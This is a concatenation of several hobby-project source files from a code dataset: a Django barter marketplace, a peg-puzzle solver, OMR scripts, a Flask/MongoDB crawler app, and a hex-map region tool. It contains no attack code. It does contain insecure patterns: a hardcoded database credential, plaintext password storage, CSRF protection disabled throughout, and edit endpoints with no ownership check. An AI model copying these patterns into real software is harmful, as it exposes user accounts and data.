\"purchases_list\": purchases_list,\n \"user_services\": user_services,\n \"watchlist\": watchlist\n })\n\n\n\n\"\"\" Renders the profile of a user \"\"\"\n@login_required\ndef profile(request, user):\n \n # get the info of the user whose profile is to be shown:\n profiler = User.objects.get(username=user)\n\n # get the services of the profiler\n services = Service.objects.filter(user_id=profiler).order_by('name')\n\n # get the watchlist of the profiler\n profiler_watchlist = profiler.watchedby.all().order_by('name')\n\n # get the purchases of the profiler\n profiler_purchases = Purchase.objects.filter(user_id=profiler)\n\n # get the purchases made to the profiler (those who have bought his services)\n profiler_sellings = Purchase.objects.filter(service_id__in=services).order_by(\"-timestamp\")\n\n # get the comments on the profiler\n comments = Comment.objects.filter(profile=profiler).order_by(\"-id\")\n\n # get the replies (if any) to the comments\n if comments:\n replies = Reply.objects.filter(comment_id__in=comments)\n else:\n replies = False\n\n # get the ratings of the profiler\n ratings = Rating.objects.filter(profile=profiler)\n\n # make a list with the users that have already voted\n ratings_list = []\n 
for rating in ratings:\n        ratings_list.append(rating.user_id)\n\n    # get the average of the ratings\n    ratings_avg = Rating.objects.filter(profile=profiler).aggregate(Avg('rating'))\n\n    # get the purchases of the user seeing this profile\n    purchases = Purchase.objects.filter(user_id=request.user)\n\n    # create a list of the IDs of the services purchased by the user to be able to render the buy/bought button correctly\n    purchases_list = []\n    for purchase in purchases:\n        purchases_list.append(purchase.service_id.id)\n\n    # check if the user has ever bought something from the profiler\n    buyer = False\n    for purchase in purchases:\n        for service in services:\n            if service.id == purchase.service_id.id:\n                buyer = True\n\n    # get the categories for the edit-service form\n    categories = Category.objects.all().order_by(\"category\")\n\n    # render the template\n    return render(request, \"barter/profile.html\", {\n        \"profiler\": profiler,\n        \"services\": services,\n        \"profiler_purchases\": profiler_purchases,\n        \"profiler_sellings\": profiler_sellings,\n        \"comments\": comments,\n        \"replies\": replies,\n        \"profiler_watchlist\": profiler_watchlist,\n        \"purchases_list\": purchases_list,\n        \"ratings\": ratings,\n        \"ratings_list\": ratings_list,\n        \"ratings_avg\": ratings_avg,\n        \"categories\": categories,\n        \"buyer\": buyer,\n        \"range\": range(1,11)\n    })\n\n\n\n\"\"\" Handles a user voting on another user's profile\"\"\"\n@login_required\n@csrf_exempt\ndef voting(request, profiler):\n\n    # get the info of the user\n    userinfo = User.objects.get(username=request.user)\n\n    # get the info of the profiler\n    profile = User.objects.get(username=profiler)\n\n    if request.method == \"PUT\":\n        data = json.loads(request.body)\n\n        # if to create a new row in Rating\n        if data[\"type\"] == 'newvote':\n            try:\n                newvote = Rating(user_id=userinfo, profile=profile, rating=data[\"rating\"])\n                newvote.save()\n\n                return JsonResponse({\"message\": \"Vote created\"}, status=202)\n\n            except:\n                return JsonResponse({\"error\": \"Could not create new vote\"}, status=404)\n\n        # else, to update an existing vote in Rating\n        else:\n            try:\n                # retrieve the existing vote from Rating and assign the new rating\n                currentvote = Rating.objects.get(user_id=userinfo, profile=profile)\n                currentvote.rating = data[\"rating\"]\n                currentvote.save()\n\n                return JsonResponse({\"message\": \"Vote updated\"}, status=202)\n\n            except:\n                return JsonResponse({\"error\": \"Could not update vote\"}, status=404)\n\n    # Post must be via GET or PUT\n    else:\n        return JsonResponse({\n            \"error\": \"GET or PUT request required.\"\n        }, status=400)\n\n\n\n\"\"\" adds or removes services from a user's watchlist \"\"\"\n@login_required\n@csrf_exempt\ndef managelist(request, service_id):\n\n    # get the info of the user\n    userinfo = User.objects.get(username=request.user)\n\n    # get the service\n    service = Service.objects.get(pk=service_id)\n\n    # Update when the user adds/removes a service from their list\n    if request.method == \"PUT\":\n        data = json.loads(request.body)\n\n        # if the user has the service on their list, remove it\n        if data[\"inlist\"]:\n            try:\n                service.watchedby.remove(userinfo)\n            except:\n                return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n        # else, add the user to the \"watchedby\" column of the service\n        else:\n            try:\n                service.watchedby.add(userinfo)\n            except:\n                return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n        return HttpResponse(status=204)\n\n    # Post must be via GET or PUT\n    else:\n        return JsonResponse({\n            \"error\": \"GET or PUT request required.\"\n        }, status=400)
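The PUT handlers in this module all share one skeleton: guard the method, `json.loads(request.body)`, mutate a row, answer with a small `JsonResponse`. A stripped-down sketch of that shape (the view and field names here are placeholders, not part of this app):

```python
import json

from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt


@csrf_exempt
def toggle_flag(request, item_id):
    # Same skeleton as managelist/buy above: method guard, JSON body, tiny response.
    if request.method != "PUT":
        return JsonResponse({"error": "PUT request required."}, status=400)

    data = json.loads(request.body)
    # ... look up the row for item_id, apply data["flag"] to it, save() ...
    return JsonResponse({"message": "ok"}, status=202)
```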
\n\n\n\"\"\" handles a user buying a service \"\"\"\n@login_required\n@csrf_exempt\ndef buy(request, service_id):\n\n    # get the info of the user\n    userinfo = User.objects.get(username=request.user)\n\n    # get the service\n    service = Service.objects.get(pk=service_id)\n\n    # get the user who offers this service\n    profiler = User.objects.get(username=service.user_id)\n\n    # Attempt to buy this service for this user\n    if request.method == \"PUT\":\n        data = json.loads(request.body)\n\n        if data[\"buy\"]:\n            try:\n                # check that the user has enough points to buy the service\n                if userinfo.points < service.price:\n                    return JsonResponse({\"message\": \"Not enough points\"}, status=201)\n                else:\n                    # update the user's points after the purchase\n                    updatedpoints = int(userinfo.points - service.price)\n                    userinfo.points = updatedpoints\n                    userinfo.save()\n\n                    # update the points of the user who offers the service\n                    profilernewpoints = int(profiler.points + service.price)\n                    profiler.points = profilernewpoints\n                    profiler.save()\n\n                    # when updating the service's remaining slots, if they are now 0, set the service's status to false (inactive)\n                    updatedslots = int(service.slots - 1)\n                    service.slots = updatedslots\n                    if service.slots == 0:\n                        service.status = False\n                    service.save()\n\n                    # update the model Purchase\n                    newpurchase = Purchase(user_id=userinfo , service_id=service , amountpaid=service.price)\n                    newpurchase.save()\n\n                    return JsonResponse({\"message\": \"Purchase ok\"}, status=202)\n\n            except:\n                return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n        else:\n            return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n        return HttpResponse(status=204)\n\n    # Post must be via GET or PUT\n    else:\n        return JsonResponse({\n            \"error\": \"GET or PUT request required.\"\n        }, status=400)\n\n\n\n\"\"\" handles a user closing or re-opening one of their services \"\"\"\n@login_required\n@csrf_exempt\ndef opencloseservice(request, service_id):\n\n    # get the info of the user\n    userinfo = User.objects.get(username=request.user)\n\n    # get the service\n    service = Service.objects.get(pk=service_id)\n\n    # Attempt to close or re-open this service for this user\n    if request.method == \"PUT\":\n        data = json.loads(request.body)\n\n        if data[\"status\"]:\n            try:\n                if userinfo != service.user_id:\n                    return JsonResponse({\"error\": \"You're not the poster of this service\"}, status=201)\n\n                else:\n                    service.status = False\n                    service.save()\n                    return JsonResponse({\"message\": \"Closing ok\"}, status=202)\n\n            except:\n                return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n        else:\n            try:\n                if userinfo != service.user_id:\n                    return JsonResponse({\"error\": \"You're not the poster of this service\"}, status=201)\n\n                else:\n                    if service.slots == 0:\n                        return JsonResponse({\"message\": \"0 slots\"}, status=203)\n                    else:\n                        service.status = True\n                        service.save()\n                        return JsonResponse({\"message\": \"Opening ok\"}, status=202)\n\n            except:\n                return JsonResponse({\"error\": \"Record not found\"}, status=404)\n\n    # Post must be via PUT\n    else:\n        return JsonResponse({\n            \"error\": \"PUT request required.\"\n        }, status=400)\n\n\n\n\"\"\" When a user wants to edit their bio. 
If by GET, then the bio is returned to be loaded on the textarea\nso the user can edit it \"\"\"\n@login_required\n@csrf_exempt\ndef editbio(request, user):\n\n # Query for requested bio\n try:\n userinfo = User.objects.get(username=user)\n except User.DoesNotExist:\n return JsonResponse({\"error\": \"User not found.\"}, status=404)\n\n # Return bio contents\n if request.method == \"GET\":\n return JsonResponse(userinfo.serialize())\n\n # Update when the bio is edited\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n userinfo.bio = data[\"bio\"]\n userinfo.save()\n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" When a user wants to edit one of their services \"\"\"\n@login_required\n@csrf_exempt\ndef editservice(request, service_id):\n \n # Query for requested service\n try:\n service = Service.objects.get(pk=service_id)\n except Service.DoesNotExist:\n return JsonResponse({\"error\": \"Service not found.\"}, status=404)\n\n # Return service current details\n if request.method == \"GET\":\n return JsonResponse(service.serialize())\n\n # Update when the service is edited\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n service.name = data[\"servicename\"]\n service.description = data[\"servicedescription\"]\n service.price = data[\"serviceprice\"]\n service.slots = data[\"serviceslots\"]\n\n # convert the category to an instance of Category\n newcategory = Category.objects.get(category=data[\"servicecategory\"])\n service.category = newcategory\n\n service.save()\n \n return HttpResponse(status=204)\n\n # Post must be via GET or PUT\n else:\n return JsonResponse({\n \"error\": \"GET or PUT request required.\"\n }, status=400)\n\n\n\n\"\"\" add comments to a profile \"\"\"\n@login_required\n@csrf_exempt\ndef newcomment(request):\n\n # Composing a new comment must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get content of comment\n data = json.loads(request.body)\n comment = data.get(\"comment\", \"\")\n profileraw = data.get(\"profile\", \"\")\n\n profile = User.objects.get(username=profileraw)\n\n # Save the new comment\n newcomment = Comment(\n user_id=request.user,\n profile=profile,\n comment=comment,\n )\n newcomment.save()\n\n return JsonResponse({\"message\": \"New comment added successfully.\"}, status=201)\n\n\n\n\"\"\" When a user wants to create a new service \"\"\"\n@login_required\n@csrf_exempt\ndef newservice(request):\n\n # Creating a new service must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get content of comment\n data = json.loads(request.body)\n name = data.get(\"name\", \"\")\n description = data.get(\"description\", \"\")\n price = data.get(\"price\", \"\")\n slots = data.get(\"slots\", \"\")\n categoryraw = data.get(\"category\", \"\")\n\n # convert the category to an instance of Category\n category = Category.objects.get(category=categoryraw)\n\n # Save the new service\n newservice = Service(\n user_id=request.user,\n name=name,\n description=description,\n price=price,\n slots=slots,\n category=category\n )\n newservice.save()\n\n return JsonResponse({\"message\": \"New service created successfully.\"}, status=201)\n\n\n\n\"\"\" Handles a reply to a comment \"\"\"\n@login_required\n@csrf_exempt\ndef reply(request):\n\n # Composing a reply 
must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Get details of the reply\n data = json.loads(request.body)\n reply = data.get(\"reply\", \"\")\n comment_id_raw = data.get(\"comment_id\", \"\")\n comment_id = Comment.objects.get(pk=comment_id_raw)\n \n # Save the new reply\n newreply = Reply(\n user_id=request.user,\n comment_id=comment_id,\n reply=reply\n )\n newreply.save()\n\n return JsonResponse({\"message\": \"New reply added successfully.\"}, status=201)\n\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"barter/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"barter/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"barter/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"barter/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"barter/register.html\")","repo_name":"roigle/capstone","sub_path":"barter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36415012834","text":"class PuzzlePegs:\n \"\"\"Solves the 15-peg triangular board game\"\"\"\n\n def __init__(self, start_pos: int, end_pos: int):\n \"\"\"Create a puzzle with a starting hole and ending peg location specified\"\"\" # pylint: disable=line-too-long\n # Starting hole location\n self._start_pos: int = start_pos\n\n # Ending peg location\n self._end_pos: int = end_pos\n\n # History of boards representing the jumps\n self._boards: list[list[str]] = []\n\n # History of jumps\n self._jumps: list[str] = []\n\n # Universal representation of a peg\n self._PEG: str = \"P\" # pylint: disable=invalid-name\n\n # Universal representation of a hole\n self._HOLE: str = \"H\" # pylint: disable=invalid-name\n\n # Universal table of moves\n # This is only valid for 14-hole boards of trangular shape\n self._MOVES: list[list[int]] = [ # pylint: disable=invalid-name\n [1, 2, 4],\n [1, 3, 6],\n [2, 4, 7],\n [2, 5, 9],\n [3, 5, 8],\n [3, 6, 10],\n [4, 2, 1],\n [4, 5, 6],\n [4, 7, 11],\n [4, 8, 13],\n [5, 8, 12],\n [5, 9, 14],\n [6, 3, 1],\n [6, 5, 4],\n [6, 9, 13],\n [6, 10, 15],\n [7, 4, 2],\n [7, 8, 9],\n [8, 5, 3],\n [8, 9, 10],\n [9, 5, 2],\n [9, 8, 7],\n [10, 6, 3],\n [10, 9, 8],\n [11, 7, 4],\n [11, 12, 13],\n [12, 8, 5],\n [12, 13, 14],\n [13, 12, 11],\n [13, 8, 4],\n [13, 9, 6],\n [13, 14, 15],\n [14, 13, 12],\n [14, 9, 5],\n 
[15, 10, 6],\n [15, 14, 13],\n ]\n\n @staticmethod\n def help():\n \"\"\"Print help information\"\"\"\n print(\"Usage: PuzzlePegs(start_pos, end_pos)\")\n print(\"start_pos: the location of the starting hole in the board, e.g. 13\")\n print(\"end_pos: the location of the last peg, e.g. 13\")\n\n @staticmethod\n def _print_board(board: list[str]) -> None:\n \"\"\"Print the game board in ASCII form\"\"\"\n string = \"\"\n string += f\" {board[1]}\\n\"\n string += f\" {board[2]} {board[3]}\\n\"\n string += f\" {board[4]} {board[5]} {board[6]}\\n\"\n string += f\" {board[7]} {board[8]} {board[9]} {board[10]}\\n\"\n string += f\"{board[11]} {board[12]} {board[13]} {board[14]} {board[15]}\"\n print(string)\n\n def solve(self):\n \"\"\"Solve the puzzle\"\"\"\n # Build the board. Reserve 16 spaces.\n board: list[str] = []\n board.insert(0, \" \") # Null \"space\", this space is not used\n for i in range(1, 16, 1):\n if self._start_pos == i:\n board.insert(i, self._HOLE)\n else:\n board.insert(i, self._PEG)\n\n # Store the initial board to show before the moves are printed\n original = board.copy()\n\n # Now, solve the puzzle!\n if self._solve(board):\n print(\"Initial board\")\n self._print_board(original)\n\n # Print the moves and board to the output. The moves are in reverse order due to the\n # recursion. The board states are not.\n self._jumps.reverse()\n for (jump, board) in zip(self._jumps, self._boards):\n print(jump)\n self._print_board(board)\n\n else:\n print(\"No solution could be found for this combination\")\n\n def _solve(self, board: list[str]) -> bool:\n \"\"\"Internal recursive function for solving, making use of backtracking\"\"\"\n # For every move in the table of possible moves...\n for move in self._MOVES:\n # See if we can match a PPH pattern. If we can, try following this route by calling\n # ourselves again with this modified board\n if (\n (board[move[0]] == self._PEG) and (board[move[1]] == self._PEG) and (board[move[2]] == self._HOLE)\n ): # pylint: disable=line-too-long\n # Apply the move\n board[move[0]] = self._HOLE\n board[move[1]] = self._HOLE\n board[move[2]] = self._PEG\n\n # Record the board in history of boards\n clone = board.copy()\n self._boards.append(clone)\n\n # Call ourselves recursively. If we return true then the conclusion was good. 
If it\n # was false, we hit a dead end and we should not print the move\n if self._solve(board):\n # Record the jump\n self._jumps.append(f\"Moved {move[0]} to {move[2]}, jumping over {move[1]}\")\n return True\n\n # If we end up here, undo the move and try the next one\n self._boards.pop()\n board[move[0]] = self._PEG\n board[move[1]] = self._PEG\n board[move[2]] = self._HOLE\n\n # If no pattern is matched, see if there is only one peg left and see if it is in the\n # right spot\n # Situation 1: count of PEG is 1 and the ending position was not specified\n peg_count: int = board.count(self._PEG)\n if peg_count == 1 and self._end_pos == -1:\n return True\n # Count of 'P' is 1 and the value at the ending position is 'P'\n elif peg_count == 1 and board[self._end_pos] == self._PEG:\n return True\n # Count of 'P' was not 1 or the value at the ending position was not 'P'\n else:\n return False\n","repo_name":"Techman/puzzle-pegs-py","sub_path":"puzzle_pegs.py","file_name":"puzzle_pegs.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2848724773","text":"from .models import Students, TestSet\nimport cv2\nimport numpy as np\nimport urllib\nimport json\n\ndef save_details(data, img, setId):\n\n enrollmentno = data['enrollment']\n test_id = data['test_id']\n score = data['score']\n answerKey = data['response']\n answerKey = json.dumps(answerKey)\n rs = Students.objects.filter(setId = setId).filter(enrollment= enrollmentno)\n if rs.exists():\n Students.objects.filter(enrollment= enrollmentno).delete()\n user = Students(enrollment = enrollmentno, testId =test_id, score = score, answerKey= answerKey,answerSheet = img,setId=setId) \n user.save()\n\ndef getStudentList(setId):\n rs = Students.objects.filter(setId= setId)\n student_list = []\n for record in rs:\n details = {}\n details['score'] = record.score\n details['enrollment'] = record.enrollment\n details['test_id'] = record.testId\n details['answer_sheet_img'] = record.answerSheet.url\n student_list.append(details)\n\n return student_list \n \ndef file_to_img(file):\n arr = np.asarray(bytearray(file.read()), dtype=np.uint8)\n imag = cv2.imdecode(arr, 1)\n return imag\n\ndef getAnswerKey(setId):\n \n t = TestSet.objects.filter(setId= setId)\n if t.exists():\n answerKey = t[0].answerKey\n print(type(answerKey))\n result = {\n 'data' : answerKey,\n 'correctMarks' : t[0].correctMarks,\n 'negative': t[0].negativeMarks,\n 'status': 200\n }\n return result\n \n return {\n 'status' : 404,\n 'message' : 'No Answer Key Found'\n }","repo_name":"vishnu0179/OMR-Reader","sub_path":"omr/user_scripts.py","file_name":"user_scripts.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8004206607","text":"\"\"\"src/domain/services/repository.py\"\"\"\n\nfrom typing import Any, AsyncGenerator\n\nfrom src.domain.services import Service, ServiceUncommited\nfrom src.infrastructure.database import BaseRepository, ServiceTable\n\n__all__ = (\"ServiceRepository\",)\n\n\nclass ServiceRepository(BaseRepository[ServiceTable]):\n schema_class = ServiceTable\n\n async def all(self) -> AsyncGenerator[Service, None]:\n async for instance in self._all():\n yield Service.from_orm(instance)\n\n async def get(self, key_: int, value_: Any) -> Service:\n instance = await self._get(key=key_, value=value_)\n return Service.from_orm(instance)\n\n async def create(self, schema: 
ServiceUncommited) -> Service:\n        instance: ServiceTable = await self._save(schema.dict())\n        return Service.from_orm(instance)\n\n    async def update(\n        self, key_: str, value_: Any, payload_: dict[str, Any]\n    ) -> Service:\n        instance: ServiceTable = await self._update(\n            key=key_, value=value_, payload=payload_\n        )\n        return Service.from_orm(instance)\n","repo_name":"Rostyslav-Coder/FastAPI_Beauty_Shop","sub_path":"src/domain/services/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27401110663","text":"from flask import Flask, render_template, request, jsonify\n\napp = Flask(__name__)\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nimport certifi\n\nca = certifi.where()\n\nclient = MongoClient('mongodb+srv://test:sparta@cluster0.zhropba.mongodb.net/Cluster0?retryWrites=true&w=majority',\n                     tlsCAFile=ca)\ndb = client.dbsparta\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('http://ticket.interpark.com/contents/Ranking/RankList?pKind=01011&pCate=&pType=W&pDate=20230206',\n                    headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\n# crawled data (Interpark musical rankings)\nmusicals = soup.select('body > div.rankingDetailBody > div')\nfor musical_cul in musicals:\n    title = musical_cul.select_one('td.prds > div.prdInfo > a > b')\n    if title is not None:  # rows whose title is None would break the output\n        name = title.text\n        image = musical_cul.select_one('td.prds > a > img')['src']  # both alt and src are present, but alt is just NO_image, so take src\n        content = musical_cul.select_one('td.prdDuration').text.strip()  # .strip() trims the surrounding whitespace\n        # print(name, image, content)\n        # doc = {  # commented out so rows are not re-inserted on every run\n        #     'category': '뮤지컬',\n        #     'image': image,\n        #     'name': name,\n        #     'content': content,\n        # }\n        # db.musical.insert_one(doc)  # insert the document\n\nheaders = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\ndata = requests.get('https://www.genie.co.kr/chart/top200?ditc=M&rtm=N&ymd=20210701', headers=headers)\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\ngenies = soup.select('#body-content > div.newest-list > div > table > tbody > tr')\nfor genie in genies:\n    music = genie.select_one('td.number').text[0:2]\n    image = genie.select_one('td:nth-child(3) > a > img')['src']\n    name = genie.select_one('td.info > a.title.ellipsis').text.strip()\n    artist = genie.select_one('td.info > a.artist.ellipsis').text\n    content = genie.select_one('td.info > a.albumtitle.ellipsis').text\n\n    doc = {\n        'category': 'category',\n        'image': image,\n        'name': name,\n        'content': content,\n        'artist': artist,\n    }\n    # db.music.insert_one(doc)\n
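Both crawls above follow the same BeautifulSoup shape: `select()` the row containers, then `select_one()` each field inside a row, guarding against `None` for spacer rows. A compact sketch of that pattern (the URL and selectors below are placeholders, not the real Interpark/Genie ones):

```python
import requests
from bs4 import BeautifulSoup

resp = requests.get("https://example.com/chart",
                    headers={"User-Agent": "Mozilla/5.0"})
soup = BeautifulSoup(resp.text, "html.parser")

for row in soup.select("table > tbody > tr"):   # one element per chart row
    title = row.select_one("td.title > a")
    if title is None:                           # skip ad/spacer rows
        continue
    image = row.select_one("td.thumb > img")["src"]
    print(title.text.strip(), image)
```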
@app.route(\"/music_List\", methods=[\"GET\"])\ndef music_get():\n    music_list = list(db.music.find({}, {'_id': False}))\n    return jsonify({'musics':music_list})\n\n# request/response routes\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\n@app.route('/movie_List')\ndef movie_List():\n    return render_template('movie_List.html')\n\n@app.route('/book_List')\ndef book_List():\n    return render_template('book_List.html')\n\n@app.route('/music_List')\ndef music_List():\n    return render_template('music_List.html')\n\n@app.route('/books')\ndef books():\n    return render_template('book_List.html')\n\n@app.route('/musical_List')\ndef musical_List():\n    return render_template('musical_List.html')\n\n@app.route('/login')\ndef login():\n    return render_template('login.html')\n\n@app.route('/join')\ndef join():\n    return render_template('join.html')\n\n@app.route('/board')\ndef board():\n    return render_template('board.html')\n\n@app.route('/join', methods=['GET'])\ndef test_get():\n    title_receive = request.args.get('title_give')\n    print(title_receive)\n    return jsonify({'result': 'success', 'msg': '이 요청은 GET!'})\n\n@app.route(\"/join\", methods=[\"POST\"])\ndef join_post():\n    userId_receive = request.form['userId_give']\n    userPw_receive = request.form['userPw_give']\n    userName_receive = request.form['userName_give']\n    userPhone_receive = request.form['userPhone_give']\n    # if userId_receive == '' or userPw_receive == '' or name_receive == '' or phone_receive == '':\n    #     return jsonify({'msg': '정보를 입력해주세요.'})\n    doc = {\n        'userId': userId_receive,\n        'userPw': userPw_receive,\n        'userName': userName_receive,\n        'userPhone': userPhone_receive,\n    }\n    db.member.insert_one(doc)\n\n    return jsonify({'msg':'회원가입 완료'})\n\n@app.route(\"/book\", methods=[\"GET\"])\ndef book_get():\n    book_list = list(db.books.find({}, {'_id': False}))\n    return jsonify({'books': book_list})\n\n# board (one-line reviews)\n@app.route(\"/board\", methods=[\"POST\"])\ndef board_post():\n    writer_receive = request.form[\"writer_give\"]\n    comment_receive = request.form[\"comment_give\"]\n    date_receive = request.form[\"date_give\"]\n\n    doc = {\n        'writer': writer_receive,\n        'comment': comment_receive,\n        'date': date_receive\n    }\n\n    db.board.insert_one(doc)\n    return jsonify({'msg':'한줄평 작성 완료!'})\n\n@app.route(\"/boards\", methods=[\"GET\"])\ndef board_get():\n    board_list = list(db.board.find({},{'_id':False}))\n    return jsonify({'board_list':board_list})\n\nif __name__ == '__main__':\n    app.run('0.0.0.0', port=5000, debug=True)\n","repo_name":"rhdqors/toy-project","sub_path":"prac.py","file_name":"prac.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35224203693","text":"import numpy as np\nimport random\n\nsize_array = []\n\nfor i in range(1, 21):\n    size_array.append(i*i)\n\ntime = 0\noutputList_a = []\noutputList_b = []\noutputList_c = []\nstr_sequential = []\nstr_parallel_a = []\nstr_parallel_b = []\nstr_parallel_c = []\nwhile time < 20:\n    N = size_array[time]\n\n    X = np.zeros([N, N], dtype=int)\n\n    Y = np.copy(X)\n\n    result = np.copy(X)\n\n    for a in range(N):\n        for b in range(N):\n            X[a][b] = random.randint(0, 10*N)\n            Y[a][b] = random.randint(0, 10*N)\n\n    sequential_count = 0\n    parallel_count = 0\n\n    # iterate through rows of X\n    for i in range(N):\n        # iterate through columns of Y\n        for j in range(N):\n            # iterate through rows of Y\n            parallel_count = parallel_count+1\n            for k in range(N):\n                sequential_count = sequential_count+1\n                result[i][j] += X[i][k] * Y[k][j]\n    str_sequential.append(sequential_count)\n    str_parallel_a.append(parallel_count)\n    the_string_to_write_on_file = str(N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n    outputList_a.append(the_string_to_write_on_file)\n    parallel_count = 0\n    result = np.zeros([N, N], dtype=int)\n    for i in range(N):\n        # iterate through columns of Y\n        for j in range(N):\n            # iterate through rows of Y\n            parallel_count = parallel_count+1\n            for k in range(N):\n                result[i][(j + k) % N] += X[i][k] * Y[k][(j + k) % N]\n    str_parallel_b.append(parallel_count)\n    the_string_to_write_on_file = str(N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n    outputList_b.append(the_string_to_write_on_file)\n\n    parallel_count = 0\n    result = np.zeros([N, N], dtype=int)\n\n    # initial skew for the Cannon-style alignment: shift row a left by a, column b up by b\n    for a in range(N):\n        operation_no = 1+(N-1)*a\n        parallel_count = parallel_count+operation_no\n        X[a] = np.roll(X[a], -a)\n\n    for b in range(N):\n        operation_no = 1+(N-1)*b\n        parallel_count = parallel_count+operation_no\n        Y[:, b] = np.roll(Y[:, b], -b, axis=0)\n\n    for k in range(N):\n        for i in range(N):\n            for j in range(N):\n\n                result[i][j] += X[i][j] * Y[i][j]\n\n        # shift by one between steps so each cell sees the next operand pair\n        for a in range(N):\n            parallel_count = parallel_count+(N-1)+1\n            X[a] = np.roll(X[a], -1)\n        for b in range(N):\n            parallel_count = parallel_count+(N-1)+1\n            Y[:, b] = np.roll(Y[:, b], -1, axis=0)\n\n    str_parallel_c.append(parallel_count)\n    the_string_to_write_on_file = str(N)+\" \"+str(sequential_count)+\" \"+str(parallel_count)\n    outputList_c.append(the_string_to_write_on_file)\n\n    time = time + 1\n\nWritingOnOutFile_a = open(\"Question1_a.txt\", \"w\")\nWritingOnOutFile_a.write('\\n'.join(outputList_a))\nWritingOnOutFile_a.close()\n\nWritingOnOutFile_b = open(\"Question1_b.txt\", \"w\")\nWritingOnOutFile_b.write('\\n'.join(outputList_b))\nWritingOnOutFile_b.close()\n\nWritingOnOutFile_c = open(\"Question1_c.txt\", \"w\")\nWritingOnOutFile_c.write('\\n'.join(outputList_c))\nWritingOnOutFile_c.close()\n\nprint(\"Algorithm Type, Input Size = 1,Input Size = 
\n \"\"\"\n def __init__(self, parent):\n Basic_Tool.__init__(self, parent)\n self.highlight = True\n self._selected_rid = -1\n\n self.regionType = Region\n self._need_to_update_widget = False\n\n def get_selected_region(self):\n if self._selected_rid!=-1:\n return self.parent.accessRegion(self._selected_rid, self.tool_layer())\n else:\n return None\n\n @property\n def selected(self):\n return self._selected_rid\n\n @classmethod\n def tool_layer(cls):\n return ToolLayer.terrain\n\n def deselect(self):\n self._selected_rid = -1\n self._need_to_update_widget = True\n return super().deselect()\n\n def update_gui(self):\n # update widget \n if self._selected_rid != -1:\n this_region = self.get_selected_region()\n self.widget_instance.ui.name_edit.setText(this_region.name)\n color = this_region.fill\n self.widget_instance.new_color = color\n self.widget_instance.ui.color_choice_button.setStyleSheet(\"background-color:rgb({},{},{})\".format(color.red(), color.green(), color.blue()))\n else:\n self.widget_instance.ui.name_edit.setText(\"\")\n self.widget_instance.ui.color_choice_button.setStyleSheet(\"\")\n\n self._need_to_update_widget = False\n\n def select(self, rid:int):\n \"\"\"\n Select a region\n \"\"\"\n self._selected_rid = rid\n self._need_to_update_widget = True\n\n def mouse_moved(self, event):\n if self._need_to_update_widget:\n self.update_gui()\n return NullAction()\n\n def secondary_mouse_held(self, event):\n return self.secondary_mouse_released(event)\n\n def primary_mouse_held(self, event):\n return self.primary_mouse_released(event)\n \n def secondary_mouse_released(self, event):\n \"\"\"\n Removes hex from region\n \"\"\"\n loc = screen_to_hex( event.scenePos() )\n this_rid = self.parent.accessHexRegion(loc, self.tool_layer()) \n\n if this_rid is None:\n return NullAction()\n else:\n self.select(this_rid)\n return Region_Add_Remove(rID = None, hexID=loc, layer=self.tool_layer())\n \n\n def primary_mouse_released(self, event: QtWidgets.QGraphicsSceneMouseEvent):\n loc = screen_to_hex( 